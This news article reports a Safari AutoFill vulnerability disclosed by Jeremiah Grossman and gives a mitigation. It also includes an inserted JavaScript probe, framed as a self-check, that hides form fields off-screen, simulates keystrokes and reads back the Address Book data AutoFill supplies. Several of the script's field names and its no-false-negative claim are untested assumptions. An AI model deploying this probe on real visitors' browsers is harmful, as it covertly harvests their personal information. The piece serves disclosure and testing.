A new vulnerability has been disclosed in Safari, Apple's default browser. The flaw lies in the browser's AutoFill feature and lets a malicious website harvest personal information from the user's own Address Book card, such as first name, last name, workplace, city, state, and email address, without the user ever typing anything into the page.
WhiteHat Security researcher Jeremiah Grossman posted the details of the vulnerability on his blog yesterday, along with a link to a proof-of-concept web page where users can check whether their browser is vulnerable.
Grossman explains:
“All a malicious website would have to do to surreptitiously extract Address Book card data from Safari is dynamically create form text fields with the aforementioned names, probably invisibly, and then simulate A-Z keystroke events using JavaScript. When data is populated, that is AutoFill’ed, it can be accessed and sent to the attacker.”
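The following script is an added example of the self-check that description implies; it is not from the original article and is not Grossman's own proof of concept. It creates off-screen text fields, fires synthetic A-Z key events into each one, and reads back whatever the browser's AutoFill deposited. The field names it probes and the off-screen placement are assumptions: the article does not list the exact names Safari matched. A malicious page would transmit the returned object; a self-check page only displays it.

```javascript
// Added example, not code from the article or from Grossman's PoC.
// Field names are an assumption; the article does not give the real ones.
const PROBE_FIELDS = ['name', 'company', 'city', 'state', 'email'];

// Keys to simulate; AutoFill completes a field once a typed prefix matches.
const KEYS = 'abcdefghijklmnopqrstuvwxyz';

// Key-event factory for a real browser. Only called when a DOM exists.
function browserKeyEvent(type, key) {
  return new KeyboardEvent(type, { key, bubbles: true, cancelable: true });
}

// Creates one probe input. It is moved off-screen rather than display:none,
// on the assumption that AutoFill still considers a laid-out but invisible field.
function makeProbeInput(doc, form, name) {
  const input = doc.createElement('input');
  input.type = 'text';
  input.name = name;
  input.id = name;
  input.autocomplete = 'on';
  input.style.position = 'absolute';
  input.style.left = '-9999px';
  form.appendChild(input);
  return input;
}

// Fires keydown/keypress/keyup for each letter into one field and returns
// its final value. Synthetic key events never insert text themselves, so any
// value that appears was supplied by AutoFill.
function typeIntoField(input, makeKeyEvent) {
  input.focus();
  for (const key of KEYS) {
    for (const type of ['keydown', 'keypress', 'keyup']) {
      input.dispatchEvent(makeKeyEvent(type, key));
    }
    if (input.value !== '') return input.value;
  }
  return '';
}

// Runs the whole probe and returns { fieldName: autofilledValue } for every
// field the browser populated, then removes the probe form again.
function probeAutofill(doc, fieldNames = PROBE_FIELDS, makeKeyEvent = browserKeyEvent) {
  const form = doc.createElement('form');
  form.style.position = 'absolute';
  form.style.left = '-9999px';
  doc.body.appendChild(form);
  const leaked = {};
  for (const name of fieldNames) {
    const value = typeIntoField(makeProbeInput(doc, form, name), makeKeyEvent);
    if (value !== '') leaked[name] = value;
  }
  doc.body.removeChild(form);
  return leaked;
}

// Any populated field means the browser handed Address Book data to the page.
function isVulnerable(leaked) {
  return Object.keys(leaked).length > 0;
}

// Browser entry point: run once the document is ready and report the result.
if (typeof document !== 'undefined' && typeof KeyboardEvent !== 'undefined') {
  const run = () => {
    const leaked = probeAutofill(document);
    console.log(isVulnerable(leaked)
      ? 'AutoFill leaked: ' + JSON.stringify(leaked)
      : 'Nothing was auto-filled');
  };
  if (document.readyState === 'loading') document.addEventListener('DOMContentLoaded', run);
  else run();
}
```

Load the script from an otherwise empty page and watch the console: a browser that behaves as described will print the card values without any visible form and without the user touching the keyboard. Because the key events are synthetic, an empty value is a clean result, not a false negative caused by the script's own typing.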
Grossman says he reported the vulnerability to Apple on June 17 but, apart from an automated reply, has received no acknowledgement from the Cupertino-based company. Until a fix ships, users should disable the AutoFill option that draws on the Address Book card (in Safari's AutoFill preferences, the "Using info from my Address Book card" checkbox), which is enabled by default.
Watch Demo Video:
We’ll update when we learn new information.